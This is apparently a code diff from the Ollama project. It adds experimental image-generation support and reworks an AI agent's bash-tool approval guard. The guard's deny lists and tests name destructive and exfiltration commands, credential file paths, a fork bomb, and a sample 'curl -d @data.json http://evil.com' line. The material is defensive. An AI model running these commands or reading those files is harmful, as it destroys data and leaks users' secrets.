blobs[i] = transfer.Blob{
Digest: layer.Digest,
Size: layer.Size,
From: layer.From,
}
}
srcDir, err := GetBlobsPath("")
if err != nil {
return err
}
base := mp.BaseURL()
if base.Scheme != "http" && regOpts != nil && regOpts.Insecure {
base.Scheme = "http"
}
baseURL := base.String()
var totalSize int64
for _, blob := range blobs {
totalSize += blob.Size
}
progress := func(completed, total int64) {
fn(api.ProgressResponse{
Status: "pushing model",
Digest: "sha256:model",
Total: total,
Completed: completed,
})
}
getToken := func(ctx context.Context, challenge transfer.AuthChallenge) (string, error) {
return getAuthorizationToken(ctx, registryChallenge{
Realm: challenge.Realm,
Service: challenge.Service,
Scope: challenge.Scope,
}, base.Host)
}
return transfer.Upload(ctx, transfer.UploadOptions{
Blobs: blobs,
BaseURL: baseURL,
SrcDir: srcDir,
Progress: progress,
Token: regOpts.Token,
GetToken: getToken,
Logger: slog.Default(),
Manifest: manifestJSON,
ManifestRef: mp.Tag,
Repository: mp.GetNamespaceRepository(),
})
}
func pullModelManifest(ctx context.Context, mp ModelPath, regOpts *registryOptions) (*Manifest, error) {
requestURL := mp.BaseURL().JoinPath("v2", mp.GetNamespaceRepository(), "manifests", mp.Tag)
@@ -739,7 +916,7 @@ func makeRequestWithRetry(ctx context.Context, method string, requestURL *url.UR
// Handle authentication error with one retry
challenge := parseRegistryChallenge(resp.Header.Get("www-authenticate"))
token, err := getAuthorizationToken(ctx, challenge)
token, err := getAuthorizationToken(ctx, challenge, requestURL.Host)
if err != nil {
return nil, err
}

View File

@@ -47,6 +47,15 @@ func TestModelCapabilities(t *testing.T) {
model Model
expectedCaps []model.Capability
}{
{
name: "model with image generation capability via config",
model: Model{
Config: model.ConfigV2{
Capabilities: []string{"image"},
},
},
expectedCaps: []model.Capability{model.CapabilityImageGeneration},
},
{
name: "model with completion capability",
model: Model{

View File

@@ -13,9 +13,14 @@ type Layer struct {
Digest string `json:"digest"`
Size int64 `json:"size"`
From string `json:"from,omitempty"`
Name string `json:"name,omitempty"` // tensor name, e.g., "text_encoder/model.embed_tokens.weight"
status string
}
const (
MediaTypeImageTensor = "application/vnd.ollama.image.tensor"
)
func NewLayer(r io.Reader, mediatype string) (Layer, error) {
blobs, err := GetBlobsPath("")
if err != nil {

View File

@@ -47,16 +47,40 @@ func (m *Manifest) Remove() error {
}
func (m *Manifest) RemoveLayers() error {
for _, layer := range append(m.Layers, m.Config) {
if layer.Digest != "" {
if err := layer.Remove(); errors.Is(err, os.ErrNotExist) {
slog.Debug("layer does not exist", "digest", layer.Digest)
} else if err != nil {
return err
ms, err := Manifests(true)
if err != nil {
return err
}
// Build set of digests still in use by other manifests
inUse := make(map[string]struct{})
for _, other := range ms {
for _, layer := range append(other.Layers, other.Config) {
if layer.Digest != "" {
inUse[layer.Digest] = struct{}{}
}
}
}
// Remove layers not used by any other manifest
for _, layer := range append(m.Layers, m.Config) {
if layer.Digest == "" {
continue
}
if _, used := inUse[layer.Digest]; used {
continue
}
blob, err := GetBlobsPath(layer.Digest)
if err != nil {
return err
}
if err := os.Remove(blob); errors.Is(err, os.ErrNotExist) {
slog.Debug("layer does not exist", "digest", layer.Digest)
} else if err != nil {
return err
}
}
return nil
}

View File

@@ -50,6 +50,8 @@ import (
"github.com/ollama/ollama/types/errtypes"
"github.com/ollama/ollama/types/model"
"github.com/ollama/ollama/version"
"github.com/ollama/ollama/x/imagegen"
xserver "github.com/ollama/ollama/x/server"
)
const signinURLStr = "https://ollama.com/connect?name=%s&key=%s"
@@ -1093,6 +1095,31 @@ func GetModelInfo(req api.ShowRequest) (*api.ShowResponse, error) {
QuantizationLevel: m.Config.FileType,
}
// For image generation models, populate details from imagegen package
if slices.Contains(m.Capabilities(), model.CapabilityImageGeneration) {
if info, err := imagegen.GetModelInfo(name.String()); err == nil {
modelDetails.Family = info.Architecture
modelDetails.ParameterSize = format.HumanNumber(uint64(info.ParameterCount))
modelDetails.QuantizationLevel = info.Quantization
}
}
// For safetensors LLM models (experimental), populate details from config.json
if m.Config.ModelFormat == "safetensors" && slices.Contains(m.Config.Capabilities, "completion") {
if info, err := xserver.GetSafetensorsLLMInfo(name.String()); err == nil {
if arch, ok := info["general.architecture"].(string); ok && arch != "" {
modelDetails.Family = arch
}
if paramCount, ok := info["general.parameter_count"].(int64); ok && paramCount > 0 {
modelDetails.ParameterSize = format.HumanNumber(uint64(paramCount))
}
}
// Get torch_dtype directly from config.json for quantization level
if dtype, err := xserver.GetSafetensorsDtype(name.String()); err == nil && dtype != "" {
modelDetails.QuantizationLevel = dtype
}
}
if req.System != "" {
m.System = req.System
}
@@ -1175,6 +1202,30 @@ func GetModelInfo(req api.ShowRequest) (*api.ShowResponse, error) {
return resp, nil
}
if slices.Contains(m.Capabilities(), model.CapabilityImageGeneration) {
// Populate tensor info if verbose
if req.Verbose {
if tensors, err := xserver.GetSafetensorsTensorInfo(name.String()); err == nil {
resp.Tensors = tensors
}
}
return resp, nil
}
// For safetensors LLM models (experimental), populate ModelInfo from config.json
if m.Config.ModelFormat == "safetensors" && slices.Contains(m.Config.Capabilities, "completion") {
if info, err := xserver.GetSafetensorsLLMInfo(name.String()); err == nil {
resp.ModelInfo = info
}
// Populate tensor info if verbose
if req.Verbose {
if tensors, err := xserver.GetSafetensorsTensorInfo(name.String()); err == nil {
resp.Tensors = tensors
}
}
return resp, nil
}
kvData, tensors, err := getModelData(m.ModelPath, req.Verbose)
if err != nil {
return nil, err
@@ -1536,6 +1587,9 @@ func (s *Server) GenerateRoutes(rc *ollama.Registry) (http.Handler, error) {
r.POST("/api/embed", s.EmbedHandler)
r.POST("/api/embeddings", s.EmbeddingsHandler)
// Experimental image generation
r.POST("/x/generate", s.XGenerateHandler)
// Inference (OpenAI compatibility)
r.POST("/v1/chat/completions", middleware.ChatMiddleware(), s.ChatHandler)
r.POST("/v1/completions", middleware.CompletionsMiddleware(), s.GenerateHandler)
@@ -1543,6 +1597,11 @@ func (s *Server) GenerateRoutes(rc *ollama.Registry) (http.Handler, error) {
r.GET("/v1/models", middleware.ListMiddleware(), s.ListHandler)
r.GET("/v1/models/:model", middleware.RetrieveMiddleware(), s.ShowHandler)
r.POST("/v1/responses", middleware.ResponsesMiddleware(), s.ChatHandler)
// OpenAI-compatible image generation endpoint (uses experimental /x/generate)
r.POST("/v1/images/generations", middleware.ImageGenerationsMiddleware(), s.XGenerateHandler)
// Inference (Anthropic compatibility)
r.POST("/v1/messages", middleware.AnthropicMessagesMiddleware(), s.ChatHandler)
if rc != nil {
// wrap old with new
@@ -1852,6 +1911,105 @@ func (s *Server) PsHandler(c *gin.Context) {
c.JSON(http.StatusOK, api.ProcessResponse{Models: models})
}
// XGenerateHandler handles the experimental /x/generate endpoint for image generation.
func (s *Server) XGenerateHandler(c *gin.Context) {
checkpointStart := time.Now()
var req api.GenerateRequest
if err := c.ShouldBindJSON(&req); errors.Is(err, io.EOF) {
c.AbortWithStatusJSON(http.StatusBadRequest, gin.H{"error": "missing request body"})
return
} else if err != nil {
c.AbortWithStatusJSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return
}
name := model.ParseName(req.Model)
if !name.IsValid() {
c.AbortWithStatusJSON(http.StatusBadRequest, gin.H{"error": "model is required"})
return
}
name, err := getExistingName(name)
if err != nil {
c.JSON(http.StatusNotFound, gin.H{"error": fmt.Sprintf("model '%s' not found", req.Model)})
return
}
m, err := GetModel(name.String())
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
// Check that this is an image generation model
if !slices.Contains(m.Capabilities(), model.CapabilityImageGeneration) {
c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("%q does not support image generation", req.Model)})
return
}
// Schedule the runner
r, _, _, err := s.scheduleRunner(c.Request.Context(), name.String(), []model.Capability{model.CapabilityImageGeneration}, req.Options, req.KeepAlive)
if err != nil {
handleScheduleError(c, req.Model, err)
return
}
checkpointLoaded := time.Now()
// Handle load-only request
if req.Prompt == "" {
c.JSON(http.StatusOK, api.GenerateResponse{
Model: req.Model,
CreatedAt: time.Now().UTC(),
Done: true,
DoneReason: "load",
})
return
}
ch := make(chan any)
go func() {
defer close(ch)
if err := r.Completion(c.Request.Context(), llm.CompletionRequest{
Prompt: req.Prompt,
Width: req.Width,
Height: req.Height,
Steps: req.Steps,
}, func(cr llm.CompletionResponse) {
res := api.GenerateResponse{
Model: req.Model,
CreatedAt: time.Now().UTC(),
Done: cr.Done,
}
// Image generation progress
if cr.TotalSteps > 0 {
res.Status = "generating image"
res.Completed = int64(cr.Step)
res.Total = int64(cr.TotalSteps)
}
// Final image
if cr.Image != "" {
res.Images = []string{cr.Image}
}
if cr.Done {
res.DoneReason = cr.DoneReason.String()
res.TotalDuration = time.Since(checkpointStart)
res.LoadDuration = checkpointLoaded.Sub(checkpointStart)
}
ch <- res
}); err != nil {
ch <- gin.H{"error": err.Error()}
}
}()
streamResponse(c, ch)
}
func toolCallId() string {
const letterBytes = "abcdefghijklmnopqrstuvwxyz0123456789"
b := make([]byte, 8)
@@ -2022,8 +2180,14 @@ func (s *Server) ChatHandler(c *gin.Context) {
}
} else {
if req.Think != nil && req.Think.Bool() {
c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("%q does not support thinking", req.Model)})
return
// Set think to nil when being used with Anthropic API to connect to tools like claude code
if _, ok := c.Get("relax_thinking"); ok {
slog.Warn("model does not support thinking, relaxing thinking to nil", "model", req.Model)
req.Think = nil
} else {
c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("%q does not support thinking", req.Model)})
return
}
}
}

View File

@@ -21,6 +21,7 @@ import (
"github.com/ollama/ollama/logutil"
"github.com/ollama/ollama/ml"
"github.com/ollama/ollama/types/model"
"github.com/ollama/ollama/x/imagegen"
)
type LlmRequest struct {
@@ -194,6 +195,14 @@ func (s *Scheduler) processPending(ctx context.Context) {
slog.Debug("updating default concurrency", "OLLAMA_MAX_LOADED_MODELS", maxRunners, "gpu_count", len(gpus))
}
// Check for image generation model before attempting GGML load
if slices.Contains(pending.model.Config.Capabilities, "image") {
if s.loadImageGen(pending) {
break
}
continue
}
// Load model for fitting
logutil.Trace("loading model metadata", "model", pending.model.ModelPath)
ggml, err := llm.LoadModel(pending.model.ModelPath, 1024)
@@ -543,6 +552,48 @@ iGPUScan:
return false
}
// loadImageGen loads an image generation model.
func (s *Scheduler) loadImageGen(req *LlmRequest) bool {
// Use model name for imagegen (it resolves manifests by name, not file path)
modelName := req.model.ShortName
server, err := imagegen.NewServer(modelName)
if err != nil {
req.errCh <- err
return true
}
sessionDuration := envconfig.KeepAlive()
if req.sessionDuration != nil {
sessionDuration = req.sessionDuration.Duration
}
runner := &runnerRef{
model: req.model,
modelPath: req.model.ModelPath,
llama: server,
Options: &req.opts,
loading: false,
sessionDuration: sessionDuration,
refCount: 1,
}
s.loadedMu.Lock()
s.loaded[req.model.ModelPath] = runner
s.loadedMu.Unlock()
// Set up expiration timer
runner.refMu.Lock()
if sessionDuration > 0 {
runner.expireTimer = time.AfterFunc(sessionDuration, func() {
s.expiredCh <- runner
})
}
runner.refMu.Unlock()
req.useLoadedRunner(runner, s.finishedReqCh)
return true
}
func (s *Scheduler) updateFreeSpace(allGpus []ml.DeviceInfo) {
if len(allGpus) == 0 {
return

View File

@@ -804,3 +804,93 @@ func (s *mockLlm) GetPort() int { return -
func (s *mockLlm) GetDeviceInfos(ctx context.Context) []ml.DeviceInfo { return nil }
func (s *mockLlm) HasExited() bool { return false }
func (s *mockLlm) GetActiveDeviceIDs() []ml.DeviceID { return nil }
// TestImageGenRunnerCanBeEvicted verifies that an image generation model
// loaded in the scheduler can be evicted when idle.
func TestImageGenRunnerCanBeEvicted(t *testing.T) {
ctx, done := context.WithTimeout(t.Context(), 500*time.Millisecond)
defer done()
s := InitScheduler(ctx)
s.getGpuFn = getGpuFn
s.getSystemInfoFn = getSystemInfoFn
// Simulate an image gen runner already loaded
imageGenRunner := &runnerRef{
model: &Model{Name: "z-image", ModelPath: "/fake/image/model"},
modelPath: "/fake/image/model",
llama: &mockLlm{vramSize: 21 * format.GigaByte, vramByGPU: map[ml.DeviceID]uint64{}},
sessionDuration: 5 * time.Millisecond,
refCount: 0, // idle
}
s.loadedMu.Lock()
s.loaded["/fake/image/model"] = imageGenRunner
s.loadedMu.Unlock()
// Verify the image gen runner is loaded
s.loadedMu.Lock()
require.Len(t, s.loaded, 1)
s.loadedMu.Unlock()
// findRunnerToUnload should find the idle image gen runner
runner := s.findRunnerToUnload()
require.NotNil(t, runner)
require.Equal(t, "/fake/image/model", runner.modelPath)
}
// TestImageGenSchedulerCoexistence verifies that image generation models
// can coexist with language models in the scheduler and VRAM is tracked correctly.
func TestImageGenSchedulerCoexistence(t *testing.T) {
ctx, done := context.WithTimeout(t.Context(), 500*time.Millisecond)
defer done()
s := InitScheduler(ctx)
s.getGpuFn = getGpuFn
s.getSystemInfoFn = getSystemInfoFn
// Load both an imagegen runner and a language model runner
imageGenRunner := &runnerRef{
model: &Model{Name: "flux", ModelPath: "/fake/flux/model"},
modelPath: "/fake/flux/model",
llama: &mockLlm{vramSize: 8 * format.GigaByte, vramByGPU: map[ml.DeviceID]uint64{{Library: "Metal"}: 8 * format.GigaByte}},
sessionDuration: 10 * time.Millisecond,
numParallel: 1,
refCount: 0,
}
langModelRunner := &runnerRef{
model: &Model{Name: "llama3", ModelPath: "/fake/llama3/model"},
modelPath: "/fake/llama3/model",
llama: &mockLlm{vramSize: 4 * format.GigaByte, vramByGPU: map[ml.DeviceID]uint64{{Library: "Metal"}: 4 * format.GigaByte}},
sessionDuration: 10 * time.Millisecond,
numParallel: 1,
refCount: 0,
}
s.loadedMu.Lock()
s.loaded["/fake/flux/model"] = imageGenRunner
s.loaded["/fake/llama3/model"] = langModelRunner
s.loadedMu.Unlock()
// Verify both are loaded
s.loadedMu.Lock()
require.Len(t, s.loaded, 2)
require.NotNil(t, s.loaded["/fake/flux/model"])
require.NotNil(t, s.loaded["/fake/llama3/model"])
s.loadedMu.Unlock()
// Verify updateFreeSpace accounts for both
gpus := []ml.DeviceInfo{
{
DeviceID: ml.DeviceID{Library: "Metal"},
TotalMemory: 24 * format.GigaByte,
FreeMemory: 24 * format.GigaByte,
},
}
s.updateFreeSpace(gpus)
// Free memory should be reduced by both models
expectedFree := uint64(24*format.GigaByte) - uint64(8*format.GigaByte) - uint64(4*format.GigaByte)
require.Equal(t, expectedFree, gpus[0].FreeMemory)
}

View File

@@ -279,7 +279,7 @@ func (b *blobUpload) uploadPart(ctx context.Context, method string, requestURL *
case resp.StatusCode == http.StatusUnauthorized:
w.Rollback()
challenge := parseRegistryChallenge(resp.Header.Get("www-authenticate"))
token, err := getAuthorizationToken(ctx, challenge)
token, err := getAuthorizationToken(ctx, challenge, requestURL.Host)
if err != nil {
return err
}

View File

@@ -3,12 +3,13 @@ package model
type Capability string
const (
CapabilityCompletion = Capability("completion")
CapabilityTools = Capability("tools")
CapabilityInsert = Capability("insert")
CapabilityVision = Capability("vision")
CapabilityEmbedding = Capability("embedding")
CapabilityThinking = Capability("thinking")
CapabilityCompletion = Capability("completion")
CapabilityTools = Capability("tools")
CapabilityInsert = Capability("insert")
CapabilityVision = Capability("vision")
CapabilityEmbedding = Capability("embedding")
CapabilityThinking = Capability("thinking")
CapabilityImageGeneration = Capability("image")
)
func (c Capability) String() string {

View File

@@ -1,24 +0,0 @@
# Experimental Features
## MLX Backend
We're working on a new experimental backend based on the [MLX project](https://github.com/ml-explore/mlx)
Support is currently limited to MacOS and Linux with CUDA GPUs. We're looking to add support for Windows CUDA soon, and other GPU vendors. To build:
```
cmake --preset MLX
cmake --build --preset MLX --parallel
cmake --install --component MLX
go build -tags mlx .
```
On linux, use the preset "MLX CUDA 13" or "MLX CUDA 12" to enable CUDA with the default Ollama NVIDIA GPU architectures enabled.
## Image Generation
Based on the experimental MLX backend, we're working on adding imagegen support. After running the cmake commands above:
```
go build -o imagegen ./x/imagegen/cmd/engine
```

View File

@@ -41,6 +41,7 @@ var optionLabels = []string{
var toolDisplayNames = map[string]string{
"bash": "Bash",
"web_search": "Web Search",
"web_fetch": "Web Fetch",
}
// ToolDisplayName returns the human-readable display name for a tool.
@@ -70,6 +71,9 @@ var autoAllowCommands = map[string]bool{
// autoAllowPrefixes are command prefixes that are always allowed.
// These are read-only or commonly-needed development commands.
var autoAllowPrefixes = []string{
// Git read-only
"git status", "git log", "git diff", "git branch", "git show",
"git remote -v", "git tag", "git stash list",
// Package managers - run scripts
"npm run", "npm test", "npm start",
"bun run", "bun test",
@@ -88,9 +92,6 @@ var autoAllowPrefixes = []string{
}
// denyPatterns are dangerous command patterns that are always blocked.
// NOTE: Some network patterns (curl POST, scp, rsync) moved to warnPatterns
// to allow user escalation with explicit approval.
// These patterns use word boundary matching to avoid false positives (e.g., "nc " won't match "rsync").
var denyPatterns = []string{
// Destructive commands
"rm -rf", "rm -fr",
@@ -101,8 +102,19 @@ var denyPatterns = []string{
"sudo ", "su ", "doas ",
"chmod 777", "chmod -R 777",
"chown ", "chgrp ",
// Network tools (raw sockets - still blocked)
// Network exfiltration
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
"wget --post",
"nc ", "netcat ",
"scp ", "rsync ",
// History and credentials
"history",
".bash_history", ".zsh_history",
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
".ssh/config",
".aws/credentials", ".aws/config",
".gnupg/",
"/etc/shadow", "/etc/passwd",
// Dangerous patterns
":(){ :|:& };:", // fork bomb
"chmod +s", // setuid
@@ -110,20 +122,11 @@ var denyPatterns = []string{
}
// denyPathPatterns are file patterns that should never be accessed.
// These are checked using simple substring matching.
// These are checked as exact filename matches or path suffixes.
var denyPathPatterns = []string{
// History files
"history",
".bash_history", ".zsh_history",
// SSH keys and config
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
".ssh/config",
// Cloud credentials
".aws/credentials", ".aws/config",
".gnupg/",
// System credentials
"/etc/shadow", "/etc/passwd",
// Secrets files
".env",
".env.local",
".env.production",
"credentials.json",
"secrets.json",
"secrets.yaml",
@@ -132,25 +135,6 @@ var denyPathPatterns = []string{
".key",
}
// warnPatterns are patterns that require explicit approval with warning.
// These are potentially risky but legitimate in some contexts.
// Unlike denyPatterns, these show a warning but allow user approval.
var warnPatterns = []string{
// Network operations (user may need for legitimate API testing)
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
"wget --post",
// File transfer (user may need for deployments)
"scp ", "rsync ",
}
// warnPathPatterns are file patterns that require explicit approval with warning.
// Unlike denyPathPatterns, these show a warning but allow user approval.
var warnPathPatterns = []string{
".env",
".env.local",
".env.production",
}
// ApprovalManager manages tool execution approvals.
type ApprovalManager struct {
allowlist map[string]bool // exact matches
@@ -193,8 +177,7 @@ func IsDenied(command string) (bool, string) {
// Check deny patterns
for _, pattern := range denyPatterns {
patternLower := strings.ToLower(pattern)
if containsWord(commandLower, patternLower) {
if strings.Contains(commandLower, strings.ToLower(pattern)) {
return true, pattern
}
}
@@ -209,57 +192,6 @@ func IsDenied(command string) (bool, string) {
return false, ""
}
// containsWord checks if a command contains a pattern as a word/command.
// This handles patterns like "nc " which should match "nc -l 8080" but not "rsync -avz".
// The pattern is considered a match if:
// - It appears at the start of the command, OR
// - It's preceded by a space, pipe, semicolon, or other delimiter
func containsWord(command, pattern string) bool {
// Simple contains check first
if !strings.Contains(command, pattern) {
return false
}
// Check if pattern is at the start
if strings.HasPrefix(command, pattern) {
return true
}
// Check if pattern is preceded by a delimiter (space, pipe, semicolon, &, etc.)
delimiters := []string{" ", "|", ";", "&", "(", "`", "$"}
for _, delim := range delimiters {
if strings.Contains(command, delim+pattern) {
return true
}
}
return false
}
// IsWarn checks if a bash command matches warning patterns.
// These are patterns that require explicit user approval with a warning,
// but are not completely blocked like deny patterns.
// Returns true and the matched pattern if it should warn.
func IsWarn(command string) (bool, string) {
commandLower := strings.ToLower(command)
// Check warn patterns
for _, pattern := range warnPatterns {
if strings.Contains(commandLower, strings.ToLower(pattern)) {
return true, pattern
}
}
// Check warn path patterns
for _, pattern := range warnPathPatterns {
if strings.Contains(commandLower, strings.ToLower(pattern)) {
return true, pattern
}
}
return false, ""
}
// FormatDeniedResult returns the tool result message when a command is blocked.
func FormatDeniedResult(command string, pattern string) string {
return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern)
@@ -267,7 +199,6 @@ func FormatDeniedResult(command string, pattern string) string {
// extractBashPrefix extracts a prefix pattern from a bash command.
// For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/"
// For git commands like "git log x/agent/", returns "git log:x/agent/" (includes subcommand)
// For commands without path args, returns empty string.
// Paths with ".." traversal that escape the base directory return empty string for security.
func extractBashPrefix(command string) string {
@@ -289,30 +220,12 @@ func extractBashPrefix(command string) string {
"less": true, "more": true, "file": true, "wc": true,
"grep": true, "find": true, "tree": true, "stat": true,
"sed": true,
"git": true, // git commands with path args (e.g., git log x/agent/)
}
if !safeCommands[baseCmd] {
return ""
}
// For git commands, extract the subcommand for more granular allowlisting
var subCmd string
if baseCmd == "git" && len(fields) >= 2 {
// Git subcommand is the second field (e.g., "log", "status", "diff")
// Skip options like "-v" - the first non-option argument is the subcommand
for _, arg := range fields[1:] {
if !strings.HasPrefix(arg, "-") {
subCmd = arg
break
}
}
// If no subcommand found (unlikely for git), use empty string
if subCmd == "" {
subCmd = "unknown"
}
}
// Find the first path-like argument (must contain / or \ or start with .)
// First pass: look for clear paths (containing path separators or starting with .)
for _, arg := range fields[1:] {
@@ -324,10 +237,6 @@ func extractBashPrefix(command string) string {
if isNumeric(arg) {
continue
}
// For git, skip the subcommand itself when looking for paths
if baseCmd == "git" && arg == subCmd {
continue
}
// Only process if it looks like a path (contains / or \ or starts with .)
if !strings.Contains(arg, "/") && !strings.Contains(arg, "\\") && !strings.HasPrefix(arg, ".") {
continue
@@ -369,13 +278,6 @@ func extractBashPrefix(command string) string {
dir = path.Dir(cleaned)
}
// Build prefix with subcommand for git, or just baseCmd for others
if baseCmd == "git" {
if dir == "." {
return fmt.Sprintf("git %s:./", subCmd)
}
return fmt.Sprintf("git %s:%s/", subCmd, dir)
}
if dir == "." {
return fmt.Sprintf("%s:./", baseCmd)
}
@@ -383,7 +285,6 @@ func extractBashPrefix(command string) string {
}
// Second pass: if no clear path found, use the first non-flag argument as a filename
// For git, we still allow ./ prefix even without path args (git status, git stash, etc.)
for _, arg := range fields[1:] {
if strings.HasPrefix(arg, "-") {
continue
@@ -391,12 +292,6 @@ func extractBashPrefix(command string) string {
if isNumeric(arg) {
continue
}
// For git, skip the subcommand when checking for path args
if baseCmd == "git" && arg == subCmd {
// Git commands without path args (git status, git stash, etc.)
// Still return a prefix with subcommand and current directory
return fmt.Sprintf("git %s:./", subCmd)
}
// Treat as filename in current dir
return fmt.Sprintf("%s:./", baseCmd)
}
@@ -600,37 +495,24 @@ func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any)
// This prevents buffered input from causing double-press issues
flushStdin(fd)
// Check if bash command should show warning
// Warning is shown for: commands outside cwd, or commands matching warn patterns
isWarning := false
var warningMsg string
var allowlistInfo string
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
// Check for outside cwd warning
if isCommandOutsideCwd(cmd) {
isWarning = true
warningMsg = "command targets paths outside project"
}
// Check for warn patterns (curl POST, scp, rsync, .env files)
if warned, pattern := IsWarn(cmd); warned {
isWarning = true
warningMsg = fmt.Sprintf("matches warning pattern: %s", pattern)
}
// Generate allowlist info for display
prefix := extractBashPrefix(cmd)
if prefix != "" {
// Parse prefix format "cmd:path/" into command and directory
if prefix := extractBashPrefix(cmd); prefix != "" {
colonIdx := strings.Index(prefix, ":")
if colonIdx != -1 {
cmdName := prefix[:colonIdx]
dirPath := prefix[colonIdx+1:]
// Include "(includes subdirs)" for directories that allow hierarchical matching
// ./ is special - it only allows files in current dir, not subdirs
if dirPath != "./" {
allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory (includes subdirs)", cmdName, dirPath)
allowlistInfo = fmt.Sprintf("%s in %s directory (includes subdirs)", cmdName, dirPath)
} else {
allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory", cmdName, dirPath)
allowlistInfo = fmt.Sprintf("%s in %s directory", cmdName, dirPath)
}
}
}
@@ -684,6 +566,16 @@ func formatToolDisplay(toolName string, args map[string]any) string {
}
}
// For web fetch, show URL and internet notice
if toolName == "web_fetch" {
if url, ok := args["url"].(string); ok {
sb.WriteString(fmt.Sprintf("Tool: %s\n", displayName))
sb.WriteString(fmt.Sprintf("URL: %s\n", url))
sb.WriteString("Uses internet via ollama.com")
return sb.String()
}
}
// Generic display
sb.WriteString(fmt.Sprintf("Tool: %s", displayName))
if len(args) > 0 {
@@ -712,7 +604,7 @@ type selectorState struct {
denyReason string // deny reason (always visible in box)
isWarning bool // true if command has warning
warningMessage string // dynamic warning message to display
allowlistInfo string // show what will be allowlisted (for "Always allow" option)
allowlistInfo string // show what will be allowlisted (for "Allow for this session" option)
}
// runSelector runs the interactive selector and returns the selected index and optional deny reason.
@@ -926,11 +818,9 @@ func renderSelectorBox(state *selectorState) {
// Blank line separator
fmt.Fprintf(os.Stderr, "\033[K\r\n")
// Draw options
for i, label := range optionLabels {
if i == 2 { // Deny option with input
if i == 2 {
denyLabel := "3. Deny: "
// Show placeholder if empty, actual input if typing
inputDisplay := state.denyReason
if inputDisplay == "" {
inputDisplay = "\033[90m(optional reason)\033[0m"
@@ -941,7 +831,6 @@ func renderSelectorBox(state *selectorState) {
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
}
} else {
// Show allowlist info beside "Allow for this session" (index 1)
displayLabel := label
if i == 1 && state.allowlistInfo != "" {
displayLabel = fmt.Sprintf("%s \033[90m%s\033[0m", label, state.allowlistInfo)
@@ -977,9 +866,8 @@ func updateSelectorOptions(state *selectorState) {
linesToMove := len(hintLines) - 1 + 1 + len(optionLabels)
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
// Redraw options
for i, label := range optionLabels {
if i == 2 { // Deny option
if i == 2 {
denyLabel := "3. Deny: "
inputDisplay := state.denyReason
if inputDisplay == "" {
@@ -991,7 +879,6 @@ func updateSelectorOptions(state *selectorState) {
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
}
} else {
// Show allowlist info beside "Allow for this session" (index 1)
displayLabel := label
if i == 1 && state.allowlistInfo != "" {
displayLabel = fmt.Sprintf("%s \033[90m%s\033[0m", label, state.allowlistInfo)
@@ -1113,11 +1000,11 @@ func FormatApprovalResult(toolName string, args map[string]any, result ApprovalR
switch result.Decision {
case ApprovalOnce:
label = "approved"
label = "Approved"
case ApprovalAlways:
label = "always allowed"
label = "Always allowed"
case ApprovalDeny:
label = "denied"
label = "Denied"
}
// Format based on tool type
@@ -1141,6 +1028,16 @@ func FormatApprovalResult(toolName string, args map[string]any, result ApprovalR
}
}
if toolName == "web_fetch" {
if url, ok := args["url"].(string); ok {
// Truncate long URLs
if len(url) > 50 {
url = url[:47] + "..."
}
return fmt.Sprintf("\033[1m%s:\033[0m %s: %s", label, displayName, url)
}
}
return fmt.Sprintf("\033[1m%s:\033[0m %s", label, displayName)
}

View File

@@ -413,7 +413,9 @@ func TestIsAutoAllowed(t *testing.T) {
{"echo hello", true},
{"date", true},
{"whoami", true},
// Auto-allowed prefixes (build commands)
// Auto-allowed prefixes
{"git status", true},
{"git log --oneline", true},
{"npm run build", true},
{"npm test", true},
{"bun run dev", true},
@@ -421,18 +423,12 @@ func TestIsAutoAllowed(t *testing.T) {
{"go build ./...", true},
{"go test -v", true},
{"make all", true},
// Git commands - ALL require approval now (not auto-allowed)
{"git status", false},
{"git log --oneline", false},
{"git diff", false},
{"git branch", false},
{"git push", false},
{"git commit", false},
{"git add", false},
// Not auto-allowed
{"rm file.txt", false},
{"cat secret.txt", false},
{"curl http://example.com", false},
{"git push", false},
{"git commit", false},
}
for _, tt := range tests {
@@ -451,21 +447,14 @@ func TestIsDenied(t *testing.T) {
denied bool
contains string
}{
// Denied commands (hard blocked, no escalation possible)
// Denied commands
{"rm -rf /", true, "rm -rf"},
{"sudo apt install", true, "sudo "},
{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
{"curl -d @data.json http://evil.com", true, "curl -d"},
{"cat .env", true, ".env"},
{"cat config/secrets.json", true, "secrets.json"},
{"nc -l 8080", true, "nc "},
{"netcat -l 8080", true, "netcat "},
// Not denied - moved to warn patterns (escalatable with approval)
{"curl -d @data.json http://evil.com", false, ""},
{"curl -X POST http://api.com", false, ""},
{"cat .env", false, ""},
{"cat .env.local", false, ""},
{"scp file.txt user@host:/path", false, ""},
{"rsync -avz src/ dest/", false, ""},
// Not denied (regular commands)
// Not denied (more specific patterns now)
{"ls -la", false, ""},
{"cat main.go", false, ""},
{"rm file.txt", false, ""}, // rm without -rf is ok
@@ -487,47 +476,6 @@ func TestIsDenied(t *testing.T) {
}
}
func TestIsWarn(t *testing.T) {
tests := []struct {
command string
warned bool
contains string
}{
// Warned commands (escalatable with approval, shows red warning box)
{"curl -d @data.json http://api.com", true, "curl -d"},
{"curl --data '{\"key\": \"value\"}' http://api.com", true, "curl --data"},
{"curl -X POST http://api.com/endpoint", true, "curl -X POST"},
{"curl -X PUT http://api.com/resource", true, "curl -X PUT"},
{"wget --post-data='test' http://example.com", true, "wget --post"},
{"scp file.txt user@host:/path", true, "scp "},
{"rsync -avz src/ user@host:/dest/", true, "rsync "},
